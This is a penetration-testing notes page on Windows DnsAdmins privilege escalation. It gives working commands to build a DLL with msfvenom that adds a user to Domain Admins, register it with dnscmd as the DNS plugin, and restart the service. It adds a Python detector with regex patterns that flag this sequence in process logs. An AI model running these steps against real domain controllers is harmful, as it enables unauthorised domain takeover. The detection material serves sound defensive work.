# DnsAdmins

### Overview

Members of the [**DnsAdmins**](https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#dnsadmins) group can administer the DNS Server service, including configuring it to load a plugin DLL. Because the DNS service runs as SYSTEM, typically on a domain controller, this can be exploited for privilege escalation. By leveraging this group’s permissions, we can create a malicious DLL that adds a user to the **Domain Admins** group or provides a reverse shell.

### Privilege Escalation

1. **Creating a DLL to Add a User to the Domain Admins Group**: To create a DLL that executes a command to add a user to the **Domain Admins** group, use the following command:

   ```bash
   msfvenom -p windows/x64/exec cmd='net group "Domain Admins" user1 /add /domain' -f dll -o adduser.dll
   ```
2. After generating the desired DLL, transfer it to the target machine.
3. Load the DLL into the DNS service by executing the following command:

   ```powershell
   dnscmd.exe /config /serverlevelplugindll C:\Users\user1\Desktop\adduser.dll
   ```
4. To execute the DLL, the DNS service needs to be restarted. Run the following commands:

   ```powershell
   sc.exe stop dns
   sc.exe start dns
   ```
5. To confirm that the user has been successfully added to the **Domain Admins** group, execute the following command:

   ```powershell
   net group "Domain Admins" /domain
   ```
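
For detection, steps 3 and 4 leave a recognisable trail in process-creation logging. The following added example (not part of the original page) flags `dnscmd` changes to `/serverlevelplugindll` and raises severity when a DNS service restart follows on the same host; the event field names and the sample events are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events (Event ID 4688 / Sysmon 1 style), not real logs.
# The field names (time, host, user, cmd) are assumptions for this example.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:00", "host": "DC01", "user": "CORP\\user1",
     "cmd": r"dnscmd.exe /config /serverlevelplugindll C:\Users\user1\Desktop\adduser.dll"},
    {"time": "2024-05-01T10:01:10", "host": "DC01", "user": "CORP\\user1", "cmd": "sc.exe stop dns"},
    {"time": "2024-05-01T10:01:20", "host": "DC01", "user": "CORP\\user1", "cmd": "sc.exe start dns"},
    {"time": "2024-05-01T11:00:00", "host": "DC02", "user": "CORP\\dnsops",
     "cmd": "dnscmd /zoneinfo corp.example"},
    {"time": "2024-05-01T12:00:00", "host": "DC02", "user": "CORP\\dnsops", "cmd": "sc.exe stop dns"},
]

# dnscmd [server] /config /serverlevelplugindll <path>; the path may be quoted.
PLUGIN_RE = re.compile(r'\bdnscmd(?:\.exe)?\b.*?/serverlevelplugindll\s+("[^"]+"|\S+)', re.I)
# Common ways to stop or start the DNS service from a command line.
RESTART_RE = re.compile(
    r"\b(?:sc(?:\.exe)?|net)\s+(?:stop|start)\s+dns\b|\brestart-service\s+dns\b", re.I)


def find_plugin_dll_changes(events, window=timedelta(minutes=30)):
    """Return one alert per plugin DLL change; note whether a DNS restart followed."""
    parsed = sorted(((datetime.fromisoformat(e["time"]), e) for e in events),
                    key=lambda pair: pair[0])
    alerts = []
    for when, ev in parsed:
        match = PLUGIN_RE.search(ev["cmd"])
        if not match:
            continue  # ordinary dnscmd use and lone service restarts are not flagged
        dll = match.group(1).strip('"')
        restarted = any(
            other["host"] == ev["host"]
            and when <= t <= when + window
            and RESTART_RE.search(other["cmd"])
            for t, other in parsed)
        alerts.append({
            "host": ev["host"], "user": ev["user"], "dll": dll,
            "remote_path": dll.startswith("\\\\"),  # UNC path: DLL fetched over SMB
            "restart_followed": restarted,
            "severity": "high" if restarted else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in find_plugin_dll_changes(SAMPLE_EVENTS):
        print(alert)
```

The same setting persists as the `ServerLevelPluginDll` value under `HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters`, so registry auditing on that key also catches changes made without `dnscmd.exe`.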

### References

1. <https://notes.dollarboysushil.com/windows-privilege-escalation/group-privileges/dnsadmins>

